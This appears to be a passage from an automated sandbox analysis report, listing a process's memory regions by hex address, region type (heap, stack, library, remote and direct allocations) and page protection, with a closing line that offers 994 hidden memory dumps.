24A7E53B000
|
heap
|
page read and write
|
||
|
19696613000
|
heap
|
page read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
538D000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
234F9000
|
heap
|
page read and write
|
||
|
4F64000
|
heap
|
page read and write
|
||
|
24A7C776000
|
heap
|
page read and write
|
||
|
5A2000
|
heap
|
page read and write
|
||
|
2322E000
|
stack
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
22F60000
|
remote allocation
|
page read and write
|
||
|
8240000
|
trusted library allocation
|
page read and write
|
||
|
82A000
|
heap
|
page read and write
|
||
|
4F35000
|
heap
|
page read and write
|
||
|
7F68000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
5591000
|
trusted library allocation
|
page read and write
|
||
|
22F0E000
|
stack
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
24A7E511000
|
heap
|
page read and write
|
||
|
23480000
|
heap
|
page read and write
|
||
|
196966C0000
|
trusted library allocation
|
page read and write
|
||
|
3E70000
|
remote allocation
|
page execute and read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
B32FDFE000
|
stack
|
page read and write
|
||
|
24A7E732000
|
heap
|
page read and write
|
||
|
24A7E687000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page readonly
|
||
|
19697F19000
|
heap
|
page read and write
|
||
|
2341E000
|
heap
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
|
1969660D000
|
heap
|
page read and write
|
||
|
19698336000
|
trusted library allocation
|
page read and write
|
||
|
23720000
|
heap
|
page read and write
|
||
|
22AF0000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
7C40000
|
heap
|
page read and write
|
||
|
24A7E679000
|
heap
|
page read and write
|
||
|
50BCB6B000
|
stack
|
page read and write
|
||
|
23400000
|
heap
|
page read and write
|
||
|
232A0000
|
unclassified section
|
page execute and read and write
|
||
|
3F04000
|
remote allocation
|
page execute and read and write
|
||
|
B3304FF000
|
stack
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
5D04000
|
remote allocation
|
page execute and read and write
|
||
|
196B0796000
|
heap
|
page read and write
|
||
|
22ECD000
|
stack
|
page read and write
|
||
|
196B04B2000
|
heap
|
page read and write
|
||
|
9D84000
|
direct allocation
|
page execute and read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
70C0000
|
trusted library allocation
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
43CE000
|
stack
|
page read and write
|
||
|
19699F32000
|
trusted library allocation
|
page read and write
|
||
|
196B05E0000
|
heap
|
page read and write
|
||
|
4F5C000
|
heap
|
page read and write
|
||
|
24A7C70C000
|
heap
|
page read and write
|
||
|
6A80000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
23721000
|
heap
|
page read and write
|
||
|
21B95C55000
|
heap
|
page read and write
|
||
|
4963000
|
heap
|
page read and write
|
||
|
24A7E78F000
|
heap
|
page read and write
|
||
|
196964B0000
|
heap
|
page read and write
|
||
|
23BA0000
|
unclassified section
|
page execute and read and write
|
||
|
24A7E7BE000
|
heap
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
196965C4000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
24A7C716000
|
heap
|
page read and write
|
||
|
23BF6000
|
unclassified section
|
page execute and read and write
|
||
|
B32FFFE000
|
stack
|
page read and write
|
||
|
2368A000
|
heap
|
page read and write
|
||
|
24A7C776000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FFB4AE90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
|
196B0803000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
538F000
|
stack
|
page read and write
|
||
|
4F83000
|
heap
|
page read and write
|
||
|
7CC000
|
heap
|
page read and write
|
||
|
8984000
|
direct allocation
|
page execute and read and write
|
||
|
24A7E642000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
627000
|
heap
|
page read and write
|
||
|
22DC0000
|
direct allocation
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
23481000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
680000
|
direct allocation
|
page read and write
|
||
|
B3300FE000
|
stack
|
page read and write
|
||
|
21B959E0000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
24A7E65E000
|
heap
|
page read and write
|
||
|
196B0630000
|
heap
|
page execute and read and write
|
||
|
23401000
|
heap
|
page read and write
|
||
|
630000
|
direct allocation
|
page read and write
|
||
|
24A7E76A000
|
heap
|
page read and write
|
||
|
19698107000
|
heap
|
page read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page read and write
|
||
|
24A7E670000
|
heap
|
page read and write
|
||
|
2CFA000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
3643000
|
heap
|
page read and write
|
||
|
4F28000
|
heap
|
page read and write
|
||
|
196A8131000
|
trusted library allocation
|
page read and write
|
||
|
782000
|
heap
|
page read and write
|
||
|
4F5C000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page readonly
|
||
|
24A7E53C000
|
heap
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page execute and read and write
|
||
|
19698597000
|
trusted library allocation
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
5364000
|
heap
|
page read and write
|
||
|
6E10000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
196B04A5000
|
heap
|
page read and write
|
||
|
2F2C000
|
heap
|
page read and write
|
||
|
24A7C70A000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
82A0000
|
direct allocation
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
8270000
|
direct allocation
|
page read and write
|
||
|
22DD0000
|
direct allocation
|
page read and write
|
||
|
19696765000
|
heap
|
page read and write
|
||
|
24A7C689000
|
heap
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
24A7E670000
|
heap
|
page read and write
|
||
|
6E29000
|
heap
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
24A7E611000
|
heap
|
page read and write
|
||
|
6E67000
|
heap
|
page read and write
|
||
|
5CAF73B000
|
stack
|
page read and write
|
||
|
3275000
|
stack
|
page read and write
|
||
|
2345D000
|
heap
|
page read and write
|
||
|
229F0000
|
heap
|
page read and write
|
||
|
494A000
|
heap
|
page read and write
|
||
|
24A7E511000
|
heap
|
page read and write
|
||
|
4525000
|
heap
|
page execute and read and write
|
||
|
7FFB4ACF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F43000
|
heap
|
page read and write
|
||
|
7FFB4ADC1000
|
trusted library allocation
|
page read and write
|
||
|
196965E4000
|
heap
|
page read and write
|
||
|
5CAEEFE000
|
stack
|
page read and write
|
||
|
50BCBEF000
|
unkown
|
page read and write
|
||
|
41D8000
|
trusted library allocation
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
46D7000
|
trusted library allocation
|
page read and write
|
||
|
720000
|
direct allocation
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
526D000
|
heap
|
page read and write
|
||
|
81B000
|
heap
|
page read and write
|
||
|
23B79000
|
unclassified section
|
page execute and read and write
|
||
|
690000
|
direct allocation
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
2F2E000
|
heap
|
page read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
24A7C6AE000
|
heap
|
page read and write
|
||
|
69FD000
|
stack
|
page read and write
|
||
|
4F41000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
19698111000
|
trusted library allocation
|
page read and write
|
||
|
6C0000
|
direct allocation
|
page read and write
|
||
|
7BF0000
|
heap
|
page read and write
|
||
|
B3301FC000
|
stack
|
page read and write
|
||
|
24A7C6AD000
|
heap
|
page read and write
|
||
|
2361A000
|
heap
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
196980B0000
|
heap
|
page execute and read and write
|
||
|
196B0660000
|
heap
|
page read and write
|
||
|
7DFC000
|
stack
|
page read and write
|
||
|
7F2A000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
|
71E000
|
stack
|
page read and write
|
||
|
23401000
|
heap
|
page read and write
|
||
|
41B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
70B0000
|
trusted library allocation
|
page read and write
|
||
|
196A840C000
|
trusted library allocation
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
4F3B000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
24A7E65C000
|
heap
|
page read and write
|
||
|
2EEE000
|
unkown
|
page read and write
|
||
|
7CF000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
426E000
|
stack
|
page read and write
|
||
|
22E6F000
|
stack
|
page read and write
|
||
|
AEE000
|
unkown
|
page read and write
|
||
|
7FFB4AE70000
|
trusted library allocation
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
2D1D000
|
heap
|
page read and write
|
||
|
24A7C6BD000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
4E21000
|
heap
|
page read and write
|
||
|
19698CC4000
|
trusted library allocation
|
page read and write
|
||
|
24A7E65C000
|
heap
|
page read and write
|
||
|
4E21000
|
heap
|
page read and write
|
||
|
24A7E642000
|
heap
|
page read and write
|
||
|
22D0F000
|
stack
|
page read and write
|
||
|
24A7E7BF000
|
heap
|
page read and write
|
||
|
703D000
|
stack
|
page read and write
|
||
|
8260000
|
direct allocation
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
57C000
|
heap
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
7FFB4AED0000
|
trusted library allocation
|
page read and write
|
||
|
232D1000
|
direct allocation
|
page execute and read and write
|
||
|
233F8000
|
heap
|
page read and write
|
||
|
7EEA000
|
heap
|
page read and write
|
||
|
7FFB4ADE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
6F0000
|
direct allocation
|
page read and write
|
||
|
700000
|
direct allocation
|
page read and write
|
||
|
196B07DA000
|
heap
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
5CAF6BE000
|
stack
|
page read and write
|
||
|
47CF000
|
stack
|
page read and write
|
||
|
49F9000
|
heap
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
815D000
|
stack
|
page read and write
|
||
|
24A7E68F000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
6E42000
|
heap
|
page read and write
|
||
|
7FFB4AE30000
|
trusted library allocation
|
page read and write
|
||
|
23B20000
|
unclassified section
|
page execute and read and write
|
||
|
4931000
|
heap
|
page read and write
|
||
|
7FFB4AE80000
|
trusted library allocation
|
page read and write
|
||
|
2364A000
|
heap
|
page read and write
|
||
|
24A7E73C000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
196B045A000
|
heap
|
page read and write
|
||
|
9384000
|
direct allocation
|
page execute and read and write
|
||
|
23C20000
|
heap
|
page read and write
|
||
|
44DD000
|
stack
|
page read and write
|
||
|
24A7E732000
|
heap
|
page read and write
|
||
|
196965A3000
|
heap
|
page read and write
|
||
|
2306C000
|
stack
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
196B079D000
|
heap
|
page read and write
|
||
|
6D22000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
4F86000
|
heap
|
page read and write
|
||
|
233F9000
|
heap
|
page read and write
|
||
|
3159000
|
heap
|
page read and write
|
||
|
24A7C620000
|
heap
|
page read and write
|
||
|
4F65000
|
heap
|
page read and write
|
||
|
4D4C000
|
heap
|
page read and write
|
||
|
19698100000
|
heap
|
page read and write
|
||
|
6E0000
|
direct allocation
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
22E2E000
|
stack
|
page read and write
|
||
|
232D0000
|
direct allocation
|
page read and write
|
||
|
24A7E711000
|
heap
|
page read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
24A7C70C000
|
heap
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
4F31000
|
heap
|
page read and write
|
||
|
24A7E679000
|
heap
|
page read and write
|
||
|
19696580000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
|
24A7C9E8000
|
heap
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
3468000
|
heap
|
page read and write
|
||
|
23760000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
415E000
|
stack
|
page read and write
|
||
|
24A7E517000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
2C50000
|
trusted library allocation
|
page read and write
|
||
|
53D000
|
stack
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
196963D0000
|
heap
|
page read and write
|
||
|
444E000
|
stack
|
page read and write
|
||
|
23721000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
4F35000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
821000
|
heap
|
page read and write
|
||
|
811E000
|
stack
|
page read and write
|
||
|
7FFB4AC2B000
|
trusted library allocation
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
24A7E611000
|
heap
|
page read and write
|
||
|
7FFB4ADF7000
|
trusted library allocation
|
page read and write
|
||
|
6A0000
|
direct allocation
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
23381000
|
heap
|
page read and write
|
||
|
24A7E670000
|
heap
|
page read and write
|
||
|
7FFB4ADD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A7E635000
|
heap
|
page read and write
|
||
|
2B9F000
|
stack
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
24A7C6C9000
|
heap
|
page read and write
|
||
|
22F9E000
|
stack
|
page read and write
|
||
|
528E000
|
stack
|
page read and write
|
||
|
196964D0000
|
heap
|
page read and write
|
||
|
4F62000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
There are 994 hidden memdumps, click here to show them.